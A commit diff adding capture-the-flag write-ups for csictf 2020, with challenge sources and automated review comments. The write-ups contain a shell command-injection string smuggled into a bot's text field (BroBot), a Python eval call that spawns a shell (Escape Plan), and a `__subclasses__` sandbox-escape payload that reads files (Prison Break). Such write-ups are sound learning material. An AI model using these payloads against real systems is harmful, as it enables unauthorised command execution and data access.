rishitsaiya
4 years ago
11 changed files with 556 additions and 0 deletions
@ -0,0 +1,34 @@ |
|||
## BroBot |
|||
The main idea finding the flag is just using Bot to get the flag. |
|||
|
|||
#### Step-1: |
|||
I tried `/about` to get information about the bot and got this: |
|||
|
|||
```python |
|||
CTF - https://ctf.csivit.com/ |
|||
Our Team - https://ctftime.org/team/77170/ |
|||
Homepage - https://csivit.com/ |
|||
Contribute - https://github.com/alias-rahil/speakingbot.git/ |
|||
CTF Support - https://discord.com/invite/9wHPB2B/ |
|||
BoT Support - @alias_rahil |
|||
``` |
|||
#### Step-2: |
|||
I used `/text2voice`. I linked to the source of the bot. It writes our text as `arg` for `echo` in a bash script. Then pipes the script's output to `espeak` to get the sound. |
|||
|
|||
#### Step-3: |
|||
I got this from [writeup](https://github.com/goswami-rahul/ctf/tree/master/csictf2020/brobot) to execute. |
|||
|
|||
```bash |
|||
fs = open(f"/home/ctf/{update.message.from_user.id}", "w") |
|||
fs.write(f"echo '{text}'") |
|||
fs.close() |
|||
os.system( |
|||
f"su ctf -c 'sh /home/ctf/{update.message.from_user.id} | espeak -w /home/ctf/{update.message.from_user.id}.wav --stdin'" |
|||
) |
|||
``` |
|||
|
|||
Then a simple `';cat flag.txt;'` gives us the answer. |
|||
|
|||
#### Step-4: |
|||
Finally the flag becomes: |
|||
`csictf{ai_will_take_over_the_world}` |
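Review bot: The Step-3 fence is tagged `bash` but holds the bot's Python (`fs.write(f"echo '{text}'")`), and the `/about` output in Step-1 is tagged `python` although it is plain text; retag both so the highlighting does not mislead. Step-3 should also state why the input works: `text` is written unescaped between single quotes into a script that is then run with `sh`, so a quote in the message ends the `echo` argument. Naming the fix would round the writeup off, for example quoting the value with `shlex.quote` or feeding the text to `espeak` on stdin without going through a shell. In Step-2, "I linked to the source" reads like a typo for "I looked at the source".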
After Width: | Height: | Size: 18 KiB |
@ -0,0 +1,84 @@ |
|||
## Escape Plan |
|||
The main idea finding the flag is just spawning into a sandbox. |
|||
|
|||
#### Step-1: |
|||
When we run `nc chall.csivit.com 30419`, we are greeted with, |
|||
|
|||
```bash |
|||
Welcome to cipher decoder, an open-source script in python! |
|||
|
|||
EXAMPLES: |
|||
shift_cipher_key('hello', 25) |
|||
shift_cipher_bruteforce('hello') |
|||
encrypt_vigenere('TEXT', 'KEY') |
|||
decrypt_vigenere('DIVD', 'KEY') |
|||
|
|||
Currently supported ciphers: |
|||
shift_cipher_key(text, shift) |
|||
shift_cipher_bruteforce(text) |
|||
encrypt_vigenere(plaintext, key) |
|||
decrypt_vigenere(ciphertext, key) |
|||
|
|||
To exit: |
|||
exit() |
|||
|
|||
I am constantly trying to make this cipher decoder better and more secure! Help me add support to more ciphers by submitting a PR! |
|||
Hope it helps you! |
|||
``` |
|||
|
|||
#### Step-2: |
|||
So to escape, I tried `eval('__import__("os").system("/bin/bash")')` and I was in. |
|||
|
|||
Once in I directly checked, `ls -al`, and I got this: |
|||
|
|||
```bash |
|||
total 20 |
|||
drwxr-x--- 1 root ctf 4096 Jul 22 06:35 . |
|||
drwxr-xr-x 1 root root 4096 Jul 26 16:58 .. |
|||
drwxr-x--- 1 root ctf 4096 Jul 22 06:27 .git |
|||
-rwxr-x--- 1 root ctf 2654 Jul 22 06:27 crypto.py |
|||
-rwxr-x--- 1 root ctf 52 Jul 22 06:27 start.sh |
|||
``` |
|||
|
|||
#### Step-3: |
|||
I checked other files, but I will stick to procedure here. Since the description involved a PR, I checked `.git` first by `cd .git`. I got usual files: |
|||
|
|||
```bash |
|||
COMMIT_EDITMSG |
|||
HEAD |
|||
config |
|||
description |
|||
hooks |
|||
index |
|||
info |
|||
logs |
|||
objects |
|||
packed-refs |
|||
refs |
|||
``` |
|||
At this point, I generally check `logs` to get an overview over the changes in the repo, but here the permission was denied. |
|||
|
|||
#### Step-4: |
|||
So, I checked config files by `cat config` and I got this: |
|||
|
|||
```bash |
|||
[core] |
|||
repositoryformatversion = 0 |
|||
filemode = true |
|||
bare = false |
|||
logallrefupdates = true |
|||
[remote "origin"] |
|||
url = https://github.com/alias-rahil/crypto-cli |
|||
fetch = +refs/heads/*:refs/remotes/origin/* |
|||
[branch "master"] |
|||
remote = origin |
|||
merge = refs/heads/master |
|||
``` |
|||
#### Step-4: |
|||
Now, I got a URL and checked at the given head and got the flag. |
|||
|
|||
<img src="Flag.png"> |
|||
|
|||
#### Step-5: |
|||
Finally the flag becomes: |
|||
`csictf{2077m4y32_h45_35c4p3d}` |
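Review bot: There are two `#### Step-4:` headings (the `cat config` step and the "Now, I got a URL" step), so the steps read 1, 2, 3, 4, 4, 5; renumber the last two. The URL step shows its result only through `Flag.png`; add a sentence saying what was looked at on `https://github.com/alias-rahil/crypto-cli` so the step can be followed without the image. The `.git/config` listing would read better in an `ini` fence than `bash`, and the opening line says "spawning into a sandbox" although Step-2 leaves the script for a shell through `eval`.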
@ -0,0 +1,226 @@ |
|||
## Friends |
|||
The main idea finding the flag is just parsing the input smartly. |
|||
|
|||
#### Step-1: |
|||
When we download `namo.py`, we are greeted with: |
|||
|
|||
```python |
|||
import math |
|||
import sys |
|||
|
|||
def fancy(x): |
|||
a = (1/2) * x |
|||
b = (1/2916) * ((27 * x - 155) ** 2) |
|||
c = 4096 / 729 |
|||
d = (b - c) ** (1/2) |
|||
e = (a - d - 155/54) ** (1/3) |
|||
f = (a + d - 155/54) ** (1/3) |
|||
g = e + f + 5/3 |
|||
return g |
|||
|
|||
def notfancy(x): |
|||
return x**3 - 5*x**2 + 3*x + 10 |
|||
|
|||
def mathStuff(x): |
|||
if (x < 3 or x > 100): |
|||
exit() |
|||
|
|||
y = fancy(notfancy(x)) |
|||
|
|||
if isinstance(y, complex): |
|||
y = float(y.real) |
|||
|
|||
y = round(y, 0) |
|||
return y |
|||
|
|||
print("Enter a number: ") |
|||
sys.stdout.flush() |
|||
x = round(float(input()), 0) |
|||
if x == mathStuff(x): |
|||
print('Fail') |
|||
sys.stdout.flush() |
|||
else: |
|||
print(open('namo.txt').read()) |
|||
sys.stdout.flush() |
|||
``` |
|||
|
|||
#### Step-2: |
|||
So I tried basic numbers and it worked according to the given algorithm but however, we could try a float `nan` and then I ran it along with the remote server to enter the `else` condition at the end. |
|||
|
|||
```bash |
|||
echo nan | nc chall.csivit.com 30425 |
|||
``` |
|||
Output: |
|||
|
|||
```bash |
|||
Enter a number: |
|||
Mitrooon |
|||
bhaiyo aur behno "Enter a number" |
|||
mann ki baat nambar |
|||
|
|||
agar nambar barabar 1 hai { |
|||
bhaiyo aur behno "s" |
|||
} |
|||
|
|||
nahi toh agar nambar barabar 13 hai { |
|||
bhaiyo aur behno "_" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 15 hai { |
|||
bhaiyo aur behno "5" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 22 hai { |
|||
bhaiyo aur behno "4" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 28 hai { |
|||
bhaiyo aur behno "k" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 8 hai { |
|||
bhaiyo aur behno "y" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 17 hai { |
|||
bhaiyo aur behno "4" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 9 hai { |
|||
bhaiyo aur behno "_" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 4 hai { |
|||
bhaiyo aur behno "t" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 3 hai { |
|||
bhaiyo aur behno "c" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 20 hai { |
|||
bhaiyo aur behno "r" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 12 hai { |
|||
bhaiyo aur behno "n" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 0 hai { |
|||
bhaiyo aur behno "c" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 23 hai { |
|||
bhaiyo aur behno "t" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 27 hai { |
|||
bhaiyo aur behno "0" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 10 hai { |
|||
bhaiyo aur behno "n" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 11 hai { |
|||
bhaiyo aur behno "4" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 7 hai { |
|||
bhaiyo aur behno "m" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 25 hai { |
|||
bhaiyo aur behno "c" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 24 hai { |
|||
bhaiyo aur behno "_" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 6 hai { |
|||
bhaiyo aur behno "{" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 16 hai { |
|||
bhaiyo aur behno "_" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 18 hai { |
|||
bhaiyo aur behno "_" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 2 hai { |
|||
bhaiyo aur behno "i" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 5 hai { |
|||
bhaiyo aur behno "f" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 19 hai { |
|||
bhaiyo aur behno "g" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 14 hai { |
|||
bhaiyo aur behno "1" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 21 hai { |
|||
bhaiyo aur behno "3" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 26 hai { |
|||
bhaiyo aur behno "0" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 29 hai { |
|||
bhaiyo aur behno "}" |
|||
} |
|||
|
|||
nahi toh { |
|||
bhaiyo aur behno "" |
|||
} |
|||
|
|||
achhe din aa gaye |
|||
``` |
|||
|
|||
#### Step-3: |
|||
Simple substitution like 0=c, 1=s, 2=i in the context of flag like `csictf{`, would also work. Instead I got this script to get the flag. |
|||
|
|||
```bash |
|||
echo nan | nc chall.csivit.com 30425 | grep -A1 'hai {' | sed 's/agar nambar barabar //' | sed 's/nahi toh //' | sed 's/ hai {$/ =/' | sed 's/^\tbhaiyo aur behno \"//' | sed 's/\"$//' | sed 's/--//' | sed ':a;N;$!ba;s/=\n/ /g' | sort -n | uniq | awk '{print $2}' | tr -d '\n'; echo '' |
|||
``` |
|||
This is a 1 liner and we get the flag after this. |
|||
|
|||
#### Step-5: |
|||
Finally the flag becomes: |
|||
`csictf{my_n4n_15_4_gr34t_c00k}` |
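Review bot: Step-2 never says why `nan` reaches the `else` branch, which is the whole point of the challenge. Every comparison with NaN is False, so in `namo.py` the guard `if (x < 3 or x > 100)` does not call `exit()` and `x == mathStuff(x)` is False as well; one sentence saying that would do. The headings also jump from Step-3 to Step-5, and the one-liner in Step-3 would benefit from a short note on what it extracts (the index from each `barabar N hai` line and the character from the line after it, sorted by index).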
@ -0,0 +1,38 @@ |
|||
import math |
|||
import sys |
|||
|
|||
def fancy(x): |
|||
a = (1/2) * x |
|||
b = (1/2916) * ((27 * x - 155) ** 2) |
|||
c = 4096 / 729 |
|||
d = (b - c) ** (1/2) |
|||
e = (a - d - 155/54) ** (1/3) |
|||
f = (a + d - 155/54) ** (1/3) |
|||
g = e + f + 5/3 |
|||
return g |
|||
|
|||
def notfancy(x): |
|||
return x**3 - 5*x**2 + 3*x + 10 |
|||
|
|||
def mathStuff(x): |
|||
if (x < 3 or x > 100): |
|||
exit() |
|||
|
|||
y = fancy(notfancy(x)) |
|||
|
|||
if isinstance(y, complex): |
|||
y = float(y.real) |
|||
|
|||
y = round(y, 0) |
|||
return y |
|||
|
|||
print("Enter a number: ") |
|||
sys.stdout.flush() |
|||
x = round(float(input()), 0) |
|||
if x == mathStuff(x): |
|||
print('Fail') |
|||
sys.stdout.flush() |
|||
else: |
|||
print(open('namo.txt').read()) |
|||
sys.stdout.flush() |
|||
|
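Review bot: The check at the bottom fails open: the contents of `namo.txt` are printed on the `else` branch, so any input for which `x == mathStuff(x)` is False gets the file, and the range guard `if (x < 3 or x > 100)` does not reject NaN. If this file is the unmodified challenge source kept for reference, say so in a comment at the top; otherwise reject non-finite input with `math.isfinite(x)` before the comparison. `import math` is unused as committed.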
@ -0,0 +1,51 @@ |
|||
## Machine Fix |
|||
The main idea finding the flag is just understanding the algorithm. |
|||
|
|||
#### Step-1: |
|||
|
|||
After I downloaded `code.py`, I tried to understand the workflow here: |
|||
|
|||
```python |
|||
def convert (n): |
|||
if n == 0: |
|||
return '0' |
|||
nums = [] |
|||
while n: |
|||
n, r = divmod(n, 3) |
|||
nums.append(str(r)) |
|||
return ''.join(reversed(nums)) |
|||
|
|||
count=0 |
|||
n=1 |
|||
while(n<=523693181734689806809285195318): |
|||
str1=convert(n) |
|||
str2=convert(n-1) |
|||
str2='0'*(len(str1)-len(str2))+str2 |
|||
for i in range(len(str1)): |
|||
if(str1[i]!=str2[i]): |
|||
count+=1 |
|||
n+=1 |
|||
|
|||
print(count) |
|||
``` |
|||
|
|||
#### Step-2: |
|||
For every number n, n and n - 1 are converted to base 3 & then, the program compare the digits, the number of differences is added to total. |
|||
|
|||
So I wrote a simple `flag.py` script to get flag: |
|||
|
|||
```python |
|||
def flag(n): |
|||
sum = 0 |
|||
while (n > 0): |
|||
sum += n |
|||
n //= 3 |
|||
return sum |
|||
|
|||
print(flag(523693181734689806809285195318)) |
|||
``` |
|||
On running it by `python3 flag.py` |
|||
|
|||
#### Step-3: |
|||
Finally the flag becomes: |
|||
`csictf{785539772602034710213927792950}` |
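Review bot: Step-2 goes from describing `code.py` straight to `flag.py` without the reasoning that links them. The number of base-3 digits that differ between n and n - 1 is one plus the number of trailing zeros of n, so the total up to N is N + N//3 + N//9 + ..., which is what the `sum += n` / `n //= 3` loop adds up; put that in the text. "On running it by `python3 flag.py`" is an unfinished sentence, so state the output there.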
@ -0,0 +1,21 @@ |
|||
def convert (n): |
|||
if n == 0: |
|||
return '0' |
|||
nums = [] |
|||
while n: |
|||
n, r = divmod(n, 3) |
|||
nums.append(str(r)) |
|||
return ''.join(reversed(nums)) |
|||
|
|||
count=0 |
|||
n=1 |
|||
while(n<=523693181734689806809285195318): |
|||
str1=convert(n) |
|||
str2=convert(n-1) |
|||
str2='0'*(len(str1)-len(str2))+str2 |
|||
for i in range(len(str1)): |
|||
if(str1[i]!=str2[i]): |
|||
count+=1 |
|||
n+=1 |
|||
|
|||
print(count) |
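Review bot: The loop bound in `while(n<=523693181734689806809285195318)` is about 5 * 10^29 iterations, each calling `convert` twice, so this script cannot finish as written. If it is the original challenge file kept for reference, add a comment at the top saying so and pointing to `flag.py` for the closed-form count.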
@ -0,0 +1,8 @@ |
|||
def flag(n): |
|||
sum = 0 |
|||
while (n > 0): |
|||
sum += n |
|||
n //= 3 |
|||
return sum |
|||
|
|||
print(flag(523693181734689806809285195318)) |
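Review bot: `sum = 0` shadows the built-in `sum`; rename it to `total`. The function also has no docstring or comment explaining that it adds n + n//3 + n//9 + ... as the closed form of the digit-difference count in `code.py`, which a reader opening this file on its own would need.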
After Width: | Height: | Size: 156 KiB |
@ -0,0 +1,15 @@ |
|||
## No DIStractions |
|||
The main idea finding the flag is getting the flag from Discord Bot. |
|||
|
|||
#### Step-1: |
|||
|
|||
The tag `Discord` clearly implies that you have to check something out there. So, I went to misc channel and checked out this bot called `Kuwu`. |
|||
|
|||
#### Step-2: |
|||
After trying `flag`, `./flag`, etc., it worked on `.flag`. |
|||
|
|||
<img src ="Flag.png"> |
|||
|
|||
#### Step-3: |
|||
Finally the flag becomes: |
|||
`csictf{m0r3_huMaN_than_Y0u}` |
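Review bot: Step-2 shows the bot's reply only through `<img src ="Flag.png">`, which has a stray space before `=` and no `alt` text; tidy the tag and add the reply as text so the step does not depend on the image. Step-1 says "misc channel" without naming the server, and the opening line would read better as "The main idea is to get the flag from the Discord bot."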
@ -0,0 +1,79 @@ |
|||
## Prison Break |
|||
The main idea finding the flag is just escaping Python Sandbox. |
|||
|
|||
#### Step-1: |
|||
After I ran `nc chall.csivit.com 30407`, we get this a python sandbox. |
|||
|
|||
I tried various commands like flag and ctf and all, but nothing worked. |
|||
|
|||
#### Step-2: |
|||
Thanks to organiser, they gave some hint: https://ctf-wiki.github.io/ctf-wiki/pwn//linux/sandbox/python-sandbox-escape/ |
|||
|
|||
#### Step-3: |
|||
There I got this 1 liner to escape the sandbox. |
|||
|
|||
**Payload:** |
|||
```python |
|||
print(().__class__.__bases__[0].__subclasses__()[40](__file__).read()) |
|||
``` |
|||
|
|||
I got the source code, which had the flag. |
|||
|
|||
```python |
|||
#!/usr/bin/python |
|||
|
|||
import sys |
|||
|
|||
class Sandbox(object): |
|||
def execute(self, code_string): |
|||
exec(code_string) |
|||
sys.stdout.flush() |
|||
|
|||
sandbox = Sandbox() |
|||
|
|||
_raw_input = raw_input |
|||
|
|||
main = sys.modules["__main__"].__dict__ |
|||
orig_builtins = main["__builtins__"].__dict__ |
|||
|
|||
builtins_whitelist = set(( |
|||
#exceptions |
|||
'ArithmeticError', 'AssertionError', 'AttributeError', 'Exception', |
|||
|
|||
#constants |
|||
'False', 'None', 'True', |
|||
|
|||
#types |
|||
'basestring', 'bytearray', 'bytes', 'complex', 'dict', |
|||
|
|||
#functions |
|||
'abs', 'bin', 'dir', 'help' |
|||
|
|||
# blocked: eval, execfile, exit, file, quit, reload, import, etc. |
|||
)) |
|||
|
|||
for builtin in orig_builtins.keys(): |
|||
if builtin not in builtins_whitelist: |
|||
del orig_builtins[builtin] |
|||
|
|||
print("Find the flag.") |
|||
sys.stdout.flush() |
|||
|
|||
def flag_function(): |
|||
flag = "csictf{m1ch34l_sc0fi3ld_fr0m_pr1s0n_br34k}" |
|||
|
|||
while 1: |
|||
try: |
|||
sys.stdout.write(">>> ") |
|||
sys.stdout.flush() |
|||
code = _raw_input() |
|||
sandbox.execute(code) |
|||
|
|||
except Exception: |
|||
print("You have encountered an error.") |
|||
sys.stdout.flush() |
|||
``` |
|||
|
|||
#### Step-4: |
|||
Finally the flag becomes: |
|||
`csictf{m1ch34l_sc0fi3ld_fr0m_pr1s0n_br34k}` |
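Review bot: Step-3 presents the payload with no explanation of why it gets past the whitelist. The recovered source deletes names from `__builtins__` but still passes the input to `exec(code_string)`, and the payload never uses a builtin name: it walks from `()` to its base class and picks a type out of `__subclasses__()`. Say that, and note that the index `[40]` depends on the interpreter build, so it is not portable. In Step-1, "we get this a python sandbox" needs fixing, and the hint URL in Step-2 has a doubled slash in `pwn//linux`.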